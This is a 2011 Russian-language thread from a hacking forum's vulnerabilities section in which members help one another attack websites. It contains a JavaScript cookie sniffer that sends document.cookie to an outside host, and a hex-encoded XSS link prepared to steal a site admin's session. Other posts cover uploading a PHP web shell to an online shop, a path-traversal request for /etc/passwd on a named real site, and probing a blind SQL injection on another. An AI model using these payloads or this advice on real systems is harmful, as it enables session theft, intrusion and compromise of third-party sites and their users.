HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17861  
Старый 12.08.2011, 14:09
herfleisch
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649

Репутация: 97
Отправить сообщение для herfleisch с помощью ICQ
По умолчанию

Пытаюсь эксплуатировать Stack Overflow в обычном strcpy(). Успешно переписал адрес возврата из функции, но перед возвратом вызывается проверка:

Код:
Code:
call __security_check_cookie
Есть ли способы её обойти?

Windows XP
 
Ответить с цитированием

  #17862  
Старый 12.08.2011, 16:44
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от ridik77  
ridik77 said:
winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт-
img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;
и есть ява скрипт для адресной строки- javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;')
куда и как подставлять? куки должны сразу прейти или надо ждать?
в твоем случае в адресную строку следовательно и скрипт нужно для адресной строки, такжже чтоб сильно глаза не резало, переведи в хекс, прийдется подождать пока админ перейдет по ссылке...

P/S:вот подготовил код твоего снифака тебе остается подставить только название сайта:

Цитата:
Сообщение от None  
ххх.com/?a=login&say=invalid_login&username=%22%3e%3c%73%6 3%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f% 63%61%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%68%74 %74%70%7a%2e%72%75%2f%6e%79%70%62%69%34%75%38%30%6 6%35%2e%67%69%66%3f%22%2b%64%6f%63%75%6d%65%6e%74% 2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
 
Ответить с цитированием

  #17863  
Старый 12.08.2011, 17:23
ridik77
Guest
Сообщений: n/a
Провел на форуме:
931

Репутация: 0
По умолчанию

winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.

и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?
 
Ответить с цитированием

  #17864  
Старый 12.08.2011, 17:28
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от ridik77  
ridik77 said:
winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?
Куки это. Обратись к стандартному мануалу по использованию XSS:

http://ha.ckers.org/xss.html

/showthread.php?t=42326

/thread20140.html
 
Ответить с цитированием

  #17865  
Старый 12.08.2011, 18:37
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл

затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.

Сылка скачки фала такого вида

http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?
 
Ответить с цитированием

  #17866  
Старый 12.08.2011, 19:06
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию

http://www.multiplaz.ru/download//..%252f..%252f..%252f..%252f..%252f..%252f..%252f. .%252fetc/passwd

от этого можно получить что то большее? чем раскрытие путей
 
Ответить с цитированием

  #17867  
Старый 12.08.2011, 19:36
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
Сылка скачки фала такого вида
http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?
Скорее всего в базе
 
Ответить с цитированием

  #17868  
Старый 12.08.2011, 21:20
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

погомогите плз!

собственно нашёл blind,но не могу раскрутить!

Код:
Code:
http://elecsnet.ru/search/?rid=23359
 
Ответить с цитированием

  #17869  
Старый 12.08.2011, 23:41
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
погомогите плз!
собственно нашёл blind,но не могу раскрутить!
Код:
Code:
http://elecsnet.ru/search/?rid=23359
в каком месте тут скуль?
 
Ответить с цитированием

  #17870  
Старый 13.08.2011, 05:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
11202

Репутация: 11
По умолчанию

Интересует такой вопрос в книге по безопасности php говорилось допустим у нас есть запрос на выбору

mysql_query ("SELECT * FROM user WHERE id='$id'");

$id = числу но можно подставить следующие при должно проверки

$id= 10 OR nick=ADMIN и запрос будет типа

mysql_query ("SELECT * FROM user WHERE id='10 OR nick=ADMIN'");

в вожу в адресной строке следующее

http://site.ru/user.php?id=10 or nick=ADMIN

почему не срабатывает? обработки id нету ибо я сам писал запрос
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ